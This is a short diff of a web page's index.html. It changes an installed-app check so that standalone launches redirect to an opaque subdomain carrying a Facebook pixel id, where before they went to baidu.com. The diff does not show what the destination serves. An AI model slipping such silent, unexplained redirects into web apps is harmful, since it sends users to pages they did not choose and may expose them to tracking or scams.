--- a/66a0c5079015963c2e7b21be/index.html
+++ b/66a0c5079015963c2e7b21be/index.html
@@ -23,7 +23,7 @@
       var isStandalone =  window.matchMedia('(display-mode: standalone)').matches || window.navigator.standalone;
 
       if(isStandalone) {
-        window.location.href = "https://www.baidu.com/";
+        window.location.href = "https://fbpwa11.37jl5.com/m/index.html?fbPixelId=461475580003503";
       }
   </script>
   </head>
